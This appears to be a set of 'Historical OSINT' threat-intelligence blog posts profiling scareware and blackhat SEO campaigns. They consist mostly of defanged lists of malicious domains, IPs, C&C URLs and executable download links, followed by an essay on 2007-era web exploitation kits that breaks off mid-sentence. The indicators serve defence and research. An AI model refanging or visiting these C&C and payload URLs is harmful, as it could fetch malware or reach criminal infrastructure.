hxxp://refhagay.cn

hxxp://jusyadey.cn

hxxp://reqpijey.cn

hxxp://vebzaqiy.cn

hxxp://sejtogoy.cn

hxxp://yecnaquy.cn

hxxp://xufguyuy.cn

hxxp://puktunaz.cn

hxxp://zaztuvaz.cn

hxxp://sixbufiz.cn

hxxp://nofdowiz.cn

hxxp://cuvxoqoz.cn

hxxp://yugkiwuz.cn

Related malicious domains known to have participated in the campaign:

hxxp://columnultra.com - 58.17.3.41

hxxp://milkhold.com

hxxp://eagerboard.com

hxxp://yesonlynoun.com

hxxp://differdo.com

hxxp://seemlykeep.com

hxxp://seemnear.com

hxxp://modernbut.com
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Related malicious domains known to have participated in the campaign:

hxxp://litgukab.cn

hxxp://xojyupab.cn

hxxp://ritlarab.cn

hxxp://qeqyukeb.cn

hxxp://fedpijib.cn

hxxp://xumlodob.cn

hxxp://kozgewob.cn

hxxp://fajnahec.cn

hxxp://nedsicic.cn

hxxp://hertuqic.cn

hxxp://linrudoc.cn

hxxp://gilqufuc.cn

hxxp://lijwituc.cn

hxxp://loqbaxuc.cn

hxxp://camxezuc.cn

hxxp://foyxolad.cn

hxxp://bapvusad.cn

hxxp://wokmeyad.cn

hxxp://yizqosed.cn

hxxp://vivwiwef.cn

hxxp://percaqof.cn

hxxp://cepceluf.cn

hxxp://paqhizuf.cn

hxxp://vorvivag.cn

hxxp://maynixeg.cn

hxxp://mujyumig.cn

hxxp://coyrekog.cn

hxxp://xetvetih.cn

hxxp://mugyujuh.cn

hxxp://supsizuh.cn

hxxp://bixtakaj.cn

hxxp://lanmixej.cn

hxxp://worxezej.cn

hxxp://tikgepij.cn

hxxp://yatsanak.cn

hxxp://tucgosak.cn

hxxp://hihnuwak.cn

hxxp://qilfadek.cn

hxxp://zibsitik.cn

hxxp://xetmojok.cn

hxxp://yelsecuk.cn

hxxp://confowuk.cn

hxxp://pozzoxuk.cn

hxxp://savhixal.cn

hxxp://nudtaqel.cn

hxxp://keptavol.cn

hxxp://berqufam.cn

hxxp://wuqrulam.cn

hxxp://goftiwam.cn
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hxxp://vowcajem.cn

hxxp://rizfinim.cn

hxxp://jetgekom.cn

hxxp://letjucun.cn

hxxp://wivwiqap.cn

hxxp://duccesap.cn

hxxp://zamyisap.cn

hxxp://ranpovep.cn

hxxp://kucdawep.cn

hxxp://limjapip.cn

hxxp://ciggecop.cn

hxxp://ziybelop.cn

hxxp://yakquyeq.cn

hxxp://borremiq.cn

hxxp://vuzwesuq.cn

hxxp://rosvocor.cn

hxxp://hakdugas.cn

hxxp://kabmebes.cn

hxxp://purhuves.cn

hxxp://gopmocis.cn

hxxp://cabziqis.cn

hxxp://pomzonos.cn

hxxp://zojvapus.cn

hxxp://nobfemat.cn

hxxp://ritcubav.cn

hxxp://bibbikev.cn

hxxp://daslulev.cn

hxxp://naczoduv.cn

hxxp://betjoqiw.cn

hxxp://yoqlamow.cn

hxxp://jawjeqow.cn

hxxp://zijmivuw.cn

hxxp://dupqozuw.cn

hxxp://fatnudax.cn

hxxp://defrogax.cn

hxxp://kalyahax.cn

hxxp://toztipax.cn

hxxp://gecfopax.cn

hxxp://wuqzubex.cn

hxxp://hexpadix.cn

hxxp://luhnukox.cn

hxxp://vecbibey.cn

hxxp://dimgecey.cn

hxxp://fammuvey.cn

hxxp://zepfabiy.cn

hxxp://gewvamiy.cn

hxxp://pekzariy.cn

hxxp://pixkinaz.cn

hxxp://mecqulez.cn

hxxp://yubreliz.cn
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hxxp://juvmeriz.cn

hxxp://mafcixiz.cn

hxxp://butlezoz.cn

hxxp://xisqapuz.cn

hxxp://jihkohab.cn

hxxp://litgukab.cn

hxxp://xojyupab.cn

hxxp://ritlarab.cn

hxxp://qancabeb.cn

hxxp://xaqkabeb.cn

hxxp://qeqyukeb.cn

hxxp://bobhoneb.cn

hxxp://fedpijib.cn

hxxp://kozgewob.cn

hxxp://mirlacub.cn

hxxp://jokrogub.cn

hxxp://qupbihac.cn

hxxp://viqnijac.cn

hxxp://bucdawac.cn

hxxp://latzoyac.cn

hxxp://ferkogec.cn

hxxp://qujqugec.cn

hxxp://fajnahec.cn

hxxp://saybilec.cn

hxxp://yaxxosec.cn

hxxp://nedsicic.cn

hxxp://cimhijic.cn

hxxp://hertuqic.cn

hxxp://linrudoc.cn

hxxp://mahhekoc.cn

hxxp://pegvijuc.cn

hxxp://camxezuc.cn

hxxp://kossehad.cn

hxxp://bapvusad.cn

hxxp://coffebed.cn

hxxp://xadjeqid.cn

hxxp://pehxarid.cn

hxxp://maknohod.cn

hxxp://yujhaqod.cn

hxxp://vevteyod.cn

hxxp://rinmumud.cn

hxxp://xuldeyud.cn

hxxp://fedrujaf.cn

hxxp://nugnosaf.cn

hxxp://koxpelef.cn

hxxp://tecyatef.cn

hxxp://hemfowef.cn

hxxp://pavlegif.cn

hxxp://percaqof.cn

hxxp://sizkeyof.cn
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hxxp://zugkucuf.cn

hxxp://rijhuhuf.cn

hxxp://cepceluf.cn

hxxp://paqhizuf.cn

hxxp://xowjicag.cn

hxxp://dofpalag.cn

hxxp://hujrulag.cn

hxxp://maxtayag.cn

hxxp://qekvoceg.cn

hxxp://vazwureg.cn

hxxp://pilpuweg.cn

hxxp://wedruweg.cn

hxxp://cexkezeg.cn

hxxp://mujyumig.cn

hxxp://wintabog.cn

hxxp://nuzmohog.cn

hxxp://coyrekog.cn

hxxp://tubvuxog.cn

hxxp://zavdahug.cn

hxxp://yukpikug.cn

hxxp://muwsikeh.cn

hxxp://pecculeh.cn

hxxp://rafniteh.cn

hxxp://nukfijih.cn

hxxp://xetvetih.cn

hxxp://tikbacoh.cn

hxxp://zikwufuh.cn

hxxp://mugyujuh.cn

hxxp://hijbumuh.cn

hxxp://wubxayuh.cn

hxxp://quntoyuh.cn

hxxp://supsizuh.cn

hxxp://techegaj.cn

hxxp://bixtakaj.cn

hxxp://wuwbeqaj.cn

hxxp://caqhiqaj.cn

hxxp://lijzarej.cn

hxxp://lanmixej.cn

hxxp://jutzuzej.cn

hxxp://betkawij.cn

hxxp://mumrojoj.cn

hxxp://wulkukoj.cn

hxxp://selqetuj.cn

hxxp://zuvbowuj.cn

hxxp://sevpohak.cn

hxxp://qusvilak.cn

hxxp://qowrirak.cn

hxxp://tucgosak.cn

hxxp://bajhukek.cn

hxxp://qeyzecik.cn
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hxxp://pijridik.cn

hxxp://yecgajik.cn

hxxp://tovboqik.cn

hxxp://sirrotik.cn

hxxp://pomzexik.cn

hxxp://nopvafok.cn

hxxp://xetmojok.cn

hxxp://fuqzuxok.cn

hxxp://xajkimuk.cn

hxxp://confowuk.cn

hxxp://pozzoxuk.cn

hxxp://vufmikal.cn

hxxp://korkusal.cn

hxxp://yasdaxal.cn

hxxp://nibnupel.cn

hxxp://nudtaqel.cn

hxxp://zivwirel.cn

hxxp://facjacil.cn

hxxp://qaqdidil.cn

hxxp://zirmidil.cn

hxxp://pivteqil.cn

hxxp://mutzomol.cn

hxxp://bahfosol.cn

hxxp://kajvatol.cn

hxxp://keptavol.cn

hxxp://mevvuqul.cn

hxxp://berqufam.cn

hxxp://zihwujam.cn

hxxp://jormofem.cn

hxxp://vowcajem.cn

hxxp://yawyibim.cn

hxxp://mibyumim.cn

hxxp://pabfakom.cn

hxxp://jetgekom.cn

hxxp://xolkizom.cn

hxxp://mujsikum.cn

hxxp://moynukan.cn

hxxp://ranfelan.cn

hxxp://kayjamen.cn

hxxp://kudcedon.cn

hxxp://getwison.cn

hxxp://givjivon.cn

hxxp://faykirun.cn

hxxp://zebxaxun.cn

hxxp://coclecap.cn

hxxp://texnipap.cn

hxxp://humyipap.cn

hxxp://duccesap.cn

hxxp://zamyisap.cn

hxxp://lunyicep.cn
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hxxp://ranpovep.cn

hxxp://yifkebip.cn

hxxp://yiryemip.cn

hxxp://mowmoqip.cn

hxxp://wozhihop.cn

hxxp://mefrexop.cn

hxxp://qidyubup.cn

hxxp://qidjohup.cn

hxxp://lotjolup.cn

hxxp://dirdotup.cn

hxxp://memqowaq.cn

hxxp://civvufeq.cn

hxxp://bobfiliq.cn

hxxp://borremiq.cn

hxxp://singuroq.cn

hxxp://qudjuvoq.cn

hxxp://vuzwesuq.cn

hxxp://nuvmotuq.cn

hxxp://zohcidar.cn

hxxp://rentumar.cn

hxxp://fipzaqar.cn

hxxp://siqcatar.cn

hxxp://sagvitar.cn

hxxp://luqsiger.cn

hxxp://zuyxewer.cn

hxxp://jagnuyer.cn

hxxp://ruhbulir.cn

hxxp://sityeyir.cn

hxxp://rosvocor.cn

hxxp://julxapor.cn

hxxp://rixlupur.cn

hxxp://jutfisur.cn

hxxp://fabmotur.cn

hxxp://bukpuzur.cn

hxxp://pozsigas.cn

hxxp://hakdugas.cn

hxxp://lokzihas.cn

hxxp://mukkebes.cn

hxxp://mijpedes.cn

hxxp://conzakes.cn

hxxp://fodbemes.cn

hxxp://maqpumes.cn

hxxp://purhuves.cn

hxxp://hohgibis.cn

hxxp://kezyubis.cn

hxxp://gopmocis.cn

hxxp://soqsedis.cn

hxxp://defdoris.cn

hxxp://pomzonos.cn

hxxp://lanhovus.cn
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We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:55)

It’s 2008 and I’ve recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign

successfully enticing users into falling victim into fake security software also known as scareware including a variety

of dropped fake codecs largely relying on the acquisition of legitimate traffic through active blackhat SEO campaigns

in this particular case various North Korea news including Mike Tyson’s daughter themed campaigns.

Related malicious domains and redirectors known to have participated in the campaign:

hxxp://fi97.net

hxxp://is-the-boss.com - Email: dantsr@gmail.com

Related malicious domains known to have participated in the campaign:

hxxp://north-korea-news.moviegator.us

Related malicious domains known to have participated in the campaign:

hxxp://petrenko.biz

Related malicious domains known to have participated in the campaign:

hxxp://teensxporn.com - 66.197.165.41 - Email: robertxssmith@googlemail.com

hxxp://aprettygirls.com

hxxp://analporntube.com

hxxp://tuexxxteen.com

hxxp://1tubexxx.com

hxxp://teenboobstube.com

hxxp://tubexxxteen.com

Related rogue YouTube accounts known to have participated in the campaign:

hxxp://www.youtube.com/user/afohebac5ar

hxxp://www.youtube.com/user/irufupol0op

Related malicious domains known to have participated in the campaign:

hxxp://get-mega-tube.com - 216.240.143.7

hxxp://get-mega-tube.com

hxxp://my-flare-tube.com

hxxp://best-crystal-tube.com

hxxp://powerful-tube.com

hxxp://cheery-tube-portal.com

hxxp://jazzy-tubs.com

hxxp://video-tube-dot.com

hxxp://my-tube-show.com

Once executed a sample malware phones back to the following malicious C &C server IPs:

hxxp://mgjmnfgbdfb.com/fff9999.php

hxxp://mgjmnfgbdfb.com/eee9999.php

Once executed a sample malware phones back to the following malicious C &C server IPs:

hxxp://imageempires.com/perce/9dc0266f8077f4b2cd9411ed48ecdda988af00003b1280c

-

47e899830c09969686e8ccfe804c2a7ce5/c0a/perce.jpg

hxxp://imagescolor.com/item/adb0765f302764425d74c12df84cbd29185f9070bb2230a

-

42e0958e050299908de1c5f0844c2579e3/20c/item.gif
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hxxp://picturehappiness.com/werber/207/216.jpg

hxxp://archiveexefiles09.com/file.exe

Related malicious URLs known to have participated in the campaign:

hxxp://archiveexefiles09.com/softwarefortubeview.45016.exe

Related malicious URLs known to have participated in the campaign:

hxxp://archiveexefiles09.com - 91.212.65.54

hxxp://exefilesstorage.com

hxxp://exearchstortage.com

hxxp://grandfilesstore.com

hxxp://arch-grandsoftarchive.com

hxxp://hex-programmers.com

hxxp://kir-fileplanet.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - A Diversified Portfolio of Fake Security Software (2018-10-22 13:33)

It’s 2010 and I’ve recently stumbled upon a currently active and circulating malicious and fraudulent porfolio of

fake security software also known as scareware potentially enticing hundreds of thousands of users to a multi-tude

of malicious software with the cybercriminals behind the campaign potentially earning fraudulent revenue in the

process of monetizing access to malware-infected hosts largely relying on the utilization of an affiliate network-based

type of revenue sharing scheme.

Related malicious domains known to have participated in the campaign:

hxxp://thebest-antivirus00.com - 91.212.226.203; 94.228.209.195

hxxp://virusscannerpro0.com

hxxp://lightandfastscanner01.com

hxxp://thebest-antivirus01.com

hxxp://thebestantivirus01.com

hxxp://remove-spyware-11.com

hxxp://remove-virus-11.com

hxxp://thebest-antivirus11.com

hxxp://antispyware-module1.com

hxxp://antispywaremodule1.com

hxxp://antivirus-toolsr1.com

hxxp://thebest-antivirus1.com

hxxp://thebest-antivirusx1.com

hxxp://thebestantivirus02.com

hxxp://remove-spyware-12.com

hxxp://remove-virus-12.com

hxxp://delete-all-virus-22.com

hxxp://lightandfastscanner22.com

hxxp://prosecureprotection2.com

hxxp://virusscannerpro2.com

hxxp://antivirus-toolsr2.com

hxxp://thebest-antivirusx2.com

hxxp://thebestantivirus03.com

hxxp://remove-spyware-13.com

hxxp://remove-virus-13.com

hxxp://antispyware-module3.com

hxxp://antispywaremodule3.com

hxxp://virusscannerpro3.com

hxxp://windowsantivirusserver3.com

hxxp://thebest-antivirusx3.com

hxxp://thebestantivirus04.com

hxxp://remove-spyware-14.com

hxxp://remove-virus-14.com

hxxp://antispyware-scann4.com

hxxp://antivirus-toolsr4.com

hxxp://thebest-antivirusx4.com

hxxp://thebestantivirus05.com

hxxp://remove-all-spyware-55.com

hxxp://delete-all-virus-55.com

hxxp://thebest-antivirusx5.com

hxxp://remove-spyware-16.com
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hxxp://lightandfastscanner66.com

hxxp://antispywaremodule6.com

hxxp://antispyware-module7.com

hxxp://antispywaremodule7.com

hxxp://antivirus-toolsr7.com

hxxp://antispyware-scann8.com

hxxp://pro-secure-protection8.com

hxxp://windowsantivirusserver8.com

hxxp://antispyware-module9.com

hxxp://antispywaremodule9.com

hxxp://antispyware-scann9.com

hxxp://virusscannerpro9.com

hxxp://antivirus-toolsr9.com

hxxp://thebest-antivirus9.com

hxxp://antiviruspro1scan.com

hxxp://antiviruspro2scan.com

hxxp://antiviruspro7scan.com

hxxp://antiviruspro8scan.com

hxxp://antiviruspro9scan.com

hxxp://antispyware6sacnner.com

hxxp://antivirusv1tools.com

hxxp://antispyware10windows.com

hxxp://antispyware20windows.com

hxxp://antivirus-toolsvv.com

hxxp://remove-spyware-11.com

hxxp://remove-virus-11.com

hxxp://remove-spyware-12.com

hxxp://remove-virus-12.com

hxxp://delete-all-virus-22.com

hxxp://prosecureprotection2.com

hxxp://remove-spyware-13.com

hxxp://remove-virus-13.com

hxxp://windowsantivirusserver3.com

hxxp://remove-spyware-14.com

hxxp://remove-virus-14.com

hxxp://remove-all-spyware-55.com

hxxp://delete-all-virus-55.com

hxxp://remove-spyware-16.com

hxxp://pro-secure-protection8.com

hxxp://windowsantivirusserver8.com

hxxp://antivirus-toolsr9.com

hxxp://antivirusv1tools.com

hxxp://antispyware10windows.com

hxxp://antispyware20windows.com

hxxp://antivirus-toolsvv.com

Related malicious domains known to have participated in the campaign:

hxxp://run-antivirusscan0.com

hxxp://runantivirusscan0.com

hxxp://remove-spyware-11.com
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hxxp://remove-virus-11.com

hxxp://run-virus-scanner1.com

hxxp://remove-spyware-12.com

hxxp://remove-virus-12.com

hxxp://delete-all-virus-22.com

hxxp://remove-spyware-13.com

hxxp://remove-virus-13.com

hxxp://runantivirusscan3.com

hxxp://run-virusscanner3.com

hxxp://remove-spyware-14.com

hxxp://remove-virus-14.com

hxxp://run-virusscanner4.com

hxxp://remove-virus-15.com

hxxp://remove-all-spyware-55.com

hxxp://delete-all-virus-55.com

hxxp://remove-spyware-16.com

hxxp://run-virus-scanner6.com

hxxp://run-virusscanner6.com

hxxp://runantivirusscan8.com

hxxp://run-virus-scanner8.com

hxxp://windowsantivirusserver8.com

hxxp://run-virus-scanner9.com

hxxp://run-virusscanner9.com

Related malicious domains known to have participated in the campaign:

hxxp://run-antivirusscan0.com

hxxp://run-antivirusscan1.com

hxxp://run-antivirusscan3.com

hxxp://run-antivirusscan6.com

hxxp://run-antivirusscan8.com

hxxp://runantivirusscan0.com

hxxp://runantivirusscan3.com

hxxp://runantivirusscan4.com

hxxp://runantivirusscan9.com

hxxp://securepro-antivirus1.com

Related malicious domains known to have participated in the campaign:

hxxp://anti-virus-system0.com

hxxp://run-antivirusscan0.com

hxxp://runantivirusscan0.com

hxxp://perform-antivirus-scan-1.com

hxxp://remove-spyware-11.com

hxxp://remove-virus-11.com

hxxp://antivirus-system1.com

hxxp://performspywarescan1.com

hxxp://run-virus-scanner1.com

hxxp://remove-spyware-12.com

hxxp://remove-virus-12.com

hxxp://delete-all-virus-22.com

hxxp://antivirus-scanner-3.com
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hxxp://remove-spyware-13.com

hxxp://remove-virus-13.com

hxxp://runantivirusscan3.com

hxxp://run-virusscanner3.com

hxxp://remove-spyware-14.com

hxxp://remove-virus-14.com

hxxp://gloriousantivirus2014.com

hxxp://run-virusscanner4.com

hxxp://smart-pcscanner05.com

hxxp://remove-virus-15.com

hxxp://remove-all-spyware-55.com

hxxp://delete-all-virus-55.com

hxxp://perform-virus-scan5.com

hxxp://perform-antivirus-scan-6.com

hxxp://antivirus-scanner-6.com

hxxp://remove-spyware-16.com

hxxp://run-virus-scanner6.com

hxxp://run-virusscanner6.com

hxxp://antivirus-scan-server6.com

hxxp://perform-antivirus-scan-7.com

hxxp://perform-antivirus-test-7.com

hxxp://antivirus-win-system7.com

hxxp://antivirus-for-pc-8.com

Related malicious domains known to have participated in the campaign:

hxxp://perform-antivirus-scan-8.com

hxxp://perform-antivirus-test-8.com

hxxp://run-antivirusscan8.com

hxxp://runantivirusscan8.com

hxxp://run-virus-scanner8.com

hxxp://windowsantivirusserver8.com

hxxp://perform-antivirus-test-9.com

hxxp://perform-virus-scan9.com

hxxp://antispywareinfo9.com

hxxp://run-virus-scanner9.com

hxxp://run-virusscanner9.com

hxxp://antispyware06scan.com

hxxp://antispywareinfo9.com

hxxp://antivirus-for-pc-2.com

hxxp://antivirus-for-pc-4.com

hxxp://antivirus-for-pc-6.com

hxxp://antivirus-for-pc-8.com

hxxp://antiviruspro8scan.com

hxxp://extra-antivirus-scan1.com

hxxp://extra-security-scanb1.com

hxxp://run-antivirusscan0.com

hxxp://run-antivirusscan1.com

hxxp://run-antivirusscan3.com

hxxp://run-antivirusscan6.com

hxxp://run-antivirusscan8.com
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hxxp://runantivirusscan0.com

hxxp://runantivirusscan3.com

hxxp://runantivirusscan4.com

hxxp://runantivirusscan9.com

hxxp://securepro-antivirus1.com

hxxp://super-scanner-2004.com

hxxp://top-rateanrivirus0.com

hxxp://topantimalware-scanner7.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - A Diversified Portfolio of Fake Security Software Spotted in the Wild (2018-10-22 13:40) It’s 2010 and I’ve recently stumbled upon yet another malicious and fraudulent domain portfolio serving a variety of

fake security software also known as scareware potentially exposing hundreds of thousands of users to a variety of

fake security software with the cybercriminals behind the campaign potentially earning fraudulent revenue largely

relying on the utilization of an affiliate-network based type of revenue-sharing scheme.

Related malicious domains known to have participated in the campaign:

hxxp://50virus-scanner.com

hxxp://700virus-scanner.com

hxxp://antivirus-test66.com

hxxp://antivirus200scanner.com

hxxp://antivirus600scanner.com

hxxp://antivirus800scanner.com

hxxp://antivirus900scanner.com

hxxp://av-scanner200.com

hxxp://av-scanner300.com

hxxp://av-scanner400.com

hxxp://av-scanner500.com

hxxp://inetproscan031.com

hxxp://internet-scan020.com

hxxp://novirus-scan00.com

hxxp://stopvirus-scan11.com

hxxp://stopvirus-scan13.com

hxxp://stopvirus-scan16.com

hxxp://stopvirus-scan33.com

hxxp://virus66scanner.com

hxxp://virus77scanner.com

hxxp://virus88scanner.com

hxxp://antivirus-scan200.com

hxxp://antispy-scan200.com

hxxp://av-scanner200.com

hxxp://av-scanner300.com

hxxp://antivirus-scan400.com

hxxp://antispy-scan400.com

hxxp://av-scanner400.com

hxxp://av-scanner500.com

hxxp://antivirus-scan600.com

hxxp://antispy-scan600.com

hxxp://antivirus-scan700.com

hxxp://antispy-scan700.com

hxxp://av-scanner700.com

hxxp://antispy-scan800.com

hxxp://antivirus-scan900.com

hxxp://novirus-scan00.com

hxxp://stop-virus-010.com

hxxp://spywarescan010.com

Related malicious domains known to have participated in the campaign:

hxxp://antispywarehelp010.com
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hxxp://internet-scan020.com

hxxp://internet-scanner020.com

hxxp://insight-scan20.com

hxxp://internet-scanner030.com

hxxp://stop-virus-040.com

hxxp://internet-scan040.com

hxxp://insight-scan40.com

hxxp://internet-scan050.com

hxxp://internet-scanner050.com

hxxp://insight-scan60.com

hxxp://stop-virus-070.com

hxxp://internet-scan070.com

hxxp://internet-scanner070.com

hxxp://insight-scan80.com

hxxp://stop-virus-090.com

hxxp://internet-scan090.com

hxxp://internet-scanner090.com

hxxp://insight-scan90.com

hxxp://antispywarehelpk0.com

hxxp://inetproscan001.com

hxxp://novirus-scan01.com

hxxp://spyware-stop01.com

hxxp://antivirus-inet01.com

hxxp://stopvirus-scan11.com

hxxp://inetproscan031.com

hxxp://novirus-scan31.com

hxxp://antivirus-inet31.com

hxxp://novirus-scan41.com

hxxp://antivirus-inet41.com

hxxp://antivirus-inet51.com

hxxp://inetproscan061.com

hxxp://novirus-scan61.com

Related malicious domains known to have participated in the campaign:

hxxp://inetproscan081.com

hxxp://novirus-scan81.com

hxxp://inetproscan091.com

hxxp://spyware-stopb1.com

hxxp://spyware-stopm1.com

hxxp://spyware-stopn1.com

hxxp://spyware-stopz1.com

hxxp://antispywarehelp002.com

hxxp://antispywarehelp022.com

hxxp://novirus-scan22.com

hxxp://antispywarehelpk2.com

hxxp://insight-scanner2.com

hxxp://spywarescan013.com

hxxp://stopvirus-scan13.com

hxxp://novirus-scan33.com

hxxp://stopvirus-scan33.com
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hxxp://antispywarehelp004.com

hxxp://antispywarehelpk4.com

hxxp://spywarescan015.com

hxxp://novirus-scan55.com

hxxp://insight-scanner5.com

hxxp://stopvirus-scan16.com

hxxp://stopvirus-scan66.com

hxxp://antispywarehelpk6.com

hxxp://spywarescan017.com

hxxp://insight-scanner7.com

hxxp://antispywarehelp008.com

hxxp://spywarescan018.com

hxxp://stopvirus-scan18.com

hxxp://novirus-scan88.com

hxxp://stopvirus-scan88.com

hxxp://antivirus-test88.com

hxxp://antispywarehelpk8.com

hxxp://insight-scanner8.com

hxxp://insight-scanner9.com

Related malicious domains known to have participated in the campaign:

hxxp://10scanantispyware.com

hxxp://20scanantispyware.com

hxxp://30scanantispyware.com

hxxp://60scanantispyware.com

hxxp://80scanantispyware.com

hxxp://2scanantispyware.com

hxxp://3scanantispyware.com

hxxp://5scanantispyware.com

hxxp://7scanantispyware.com

hxxp://8scanantispyware.com

hxxp://spyware200scan.com

hxxp://spyware500scan.com

hxxp://spyware800scan.com

hxxp://spyware880scan.com

hxxp://50virus-scanner.com

hxxp://90virus-scanner.com

hxxp://antivirus900scanner.com

hxxp://antivirus10scanner.com

hxxp://virus77scanner.com

hxxp://virus88scanner.com

hxxp://net001antivirus.com

hxxp://net011antivirus.com

hxxp://net111antivirus.com

hxxp://net021antivirus.com

hxxp://net-02antivirus.com

hxxp://net222antivirus.com

hxxp://net-04antivirus.com

hxxp://net-05antivirus.com

hxxp://net-07antivirus.com
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We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware (2018-10-22 14:05)

It’s 2010 and I’ve recently stumbled upon a currently active and circulating malicious and fraudulent blackhat SEO

campaign successfully enticing hundreds of thousands globally into interacting with a multi-tude of rogue and

malicious software also known as scareware.

In this post I’ll profile the campaign discuss in-depth the tactics techniques and procedures of the cybercrimi-

nals behind it and provide actionable intelligence on the infrastructure behind it.

Related malicious domains known to have participated in the campaign:

hxxp://ozeqiod.cn?uid=213 - redirector - 64.86.25.201 - hxxp://bexwuq.cn

Sample URL redirection chain:

hxxp://ymarketcoms.cn/?pid=123

Related malicious domains known to have responded to the same malicious C &C server IPs (64.86.25.201):

hxxp://bombas101.com

hxxp://trhtrtrbtrtbtb.com

hxxp://opensearch-zone.com

hxxp://imaera.cn

hxxp://ariexa.cn

hxxp://ozeqiod.cn

hxxp://ariysle.cn

hxxp://ajegif.cn

hxxp://adiyki.cn

hxxp://acaisek.cn

hxxp://yvamuer.cn

hxxp://protectinstructor.cn

hxxp://blanshinblansh.net

hxxp://kostinporest.net

Related malicious domains known to have participated in the campaign:

hxxp://azikyxa.cn

hxxp://befaqki.cn

hxxp://ataini.cn

hxxp://atoycri.cn

hxxp://bimpuj.cn

hxxp://bekajop.cn

hxxp://bexwuq.cn

hxxp://azywoax.cn

hxxp://azaijy.cn

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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HIstorical OSINT - Malicious Economies of Scale - The Emergence of Efficient Platforms for Exploitation -

2007 (2018-10-22 16:23)

Dear blog readers it’s been several years since I last posted a quality update following my [1]2010 disappearance. As

it’s been quite a significant period of time since I last posted a quality update I feel it’s about time I post an quality

update by detailing the Web Malware Exploitation market segment circa 2007 prior to my visit to the GCHQ as an

independent contractor with the [2]Honeynet Project.

In this post I’ll discuss the rise of Web malware exploitation kits circa 2007 and offer in-depth discussion on

the current and emerging tactics techniques and procedures (TTPs) of the cybercriminals behind it. With cyber-

criminals continuing to actively rely on the exploitation of patched and outdated vulnerabilities and with end users

continuing to actively utilize unpatched and outdated third-party software it shouldn’t be surprising that today’s

botnets remain relatively easy to generate and orchestrate for the purpose of committing financial fraud.

Malicious Economies of Scale literally means utilizing attack techniques and exploitation approaches to effi-

ciently, yet cost and time effectively, infect or abuse as many victims as possible, in a combination with an added

layer of improved metrics on the success of the campaigns. What are the most popular web exploitation kits that

malicious parties use to achieve this? Which are the most popular vulnerabilities used in the majority of the kits?

What are the most popular techniques for embedding malware? This white paper will outline this efficiency-centered

attack model, and will cover web application vulnerabilities, client-side vulnerabilities, malvertising and black hat

SEO (search engine optimization).

An overview of the threats posed by rising number of malware embedded sites, with a discussion of the ex-

ploitation techniques and kits used, as well as detailed summaries of all the high-profile such attacks during 2007.

01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities

2007 was the year in which client-side vulnerabilities significantly replaced server-side ones as the preferred

choice of malicious attackers on their way to achieve the highest possible attack success rate, while keeping their in-

vestment in terms of know-how and personal efforts to the minimum. Among the most successful such attacks during

2007 was Storm Worm, the perfect example that the use of outdated and already patched vulnerabilities can result

in aggregating the world’s largest botnet according to industry and independent researchers’ estimates. By itself, this

attack technique is in direct contradiction with the common wisdom that zero day vulnerabilities are more dangerous

than already patched ones, however, the gang behind Storm Worm quickly envisioned this biased statement as false,

and by standardizing the exploitation process with the help of outdated vulnerabilities achieved an enormous success.

Years ago, whenever, a vulnerability was found and exploit code released in the wild, malicious attackers used

to quickly released a do-it-yourself exploitation kit to take advantage of a single exploit only. Nowadays, that’s no

longer the case, since by using a single exploit whether an outdated, or zero day one, they’re significantly limiting the

probability for a successful attack, and therefore the more diverse and served on-the-fly is the set of exploits used in

an attack, the higher would the success rate be.

What was even more interesting to monitor during 2007, was the rise of high-profile sites serving malware,

and the decline of malware coming from bogus ones. From the [3]Massive Embedded Malware Attack at a large

Italian ISP to the Bank of India, the Syrian Embassy in the U.K, the U.S Consulate in St. Petersburg, China’s CSIRT,

Possibility Media’s entire portfolio of E-zines, to the French government’s site related to Lybia, these trusted web

sites were all found to serve malware though an embedded link pointing back to the attacker’s malicious server. Let’s

clarify what malicious economies of scale means, and how do they do it.

02. What is malicious economies of scale, and how is it achieved?
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Malicious economies of scale is a term I coined in 2007 to summarize the ongoing trend of efficiently attacking online users, by standardizing the exploitation process, and by doing so, not just lowering the entry barriers into

the process of exploiting a large number of users, but also, maintaining a rather static success rate of infections.

Malicious economies of scale is the efficient way by which a large number of end users get infected, or have their

online abused, with the malicious parties maintaining a static attack model. It’s perhaps more important to also

describe how is the process achieved at the first place? The first strategy applied has to do with common sense in

respect to the most popular software applications present at the end user’s end, and the first touch-point in this case

would be the end user’s Internet browser.

Having its version easily detected and exploit served, one that’s directly matching the vulnerable version, is

among the web exploitation kits main functionalities. Let’s continue with the second strategy, namely to increase the

probability of success. As I’ve already pointed out, do-it-yourself single vulnerability exploiting tools matured into

web exploitation malware kits, now backed up with a diverse set of exploits targeting different client-side applications,

which in this case is the process of increasing the probability of successful infection. The third strategy has to do

with attracting the traffic to the malicious server, that as I’ve already discussed is already automatically set to

anticipate the upcoming flood of users and serve the malware through exploiting client-side software vulnerabilities

on their end. This is mainly done through exploiting remote file inclusion vulnerabilities within the high-profile

targets, or through remotely exploitable web application vulnerabilities to basically embed a single line of code,

or an obfuscated javascript that when deobfuscated will load the malicious URL in between loading the legitimate site.

Popular Malware Embedded Attack Tactics

This part of the article will briefly describe some of the most common attack tactics malicious parties use to

embed links to their malicious servers on either high-profile sites, or any other site with a high pagerank, something

they’ve started measuring as of recently according to threat intell assessment on an automated system to embed

links based on a site’s popularity.

• The “pull” Approach – Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site

In this tactic, malicious parties entirely rely on the end users to reach their malicious server, compared to the second

tactic of “pushing” the malicious links to them. This is primarily accomplished through the use of Blackhat SEO

tools generating junk content with the idea to successfully attract search engine traffic for popular queries, thus

infecting anyone who visits the site, who often appear within the first twenty search results. The second “pull”

approach such tactic is harnessing the already established trust of a site such as major news portal for instance,

and by embedding a link to automatically load on the portal, have the users actually “pull” the malware for themselves

• The “push” Approach – Here’s Your Malware Embedded Link

The “push” approach’s success relies in its simple logic, with end users still worrying about downloading or clicking on

email attachments given the overall lack of understanding on how to protect from sites serving malware, it’s logical

to consider that basically sending a link which once visited will automatically infect the visitor though exploiting a

client-side vulnerability, actually works. Storm Worm is the perfect example, and to demonstrate what malicious

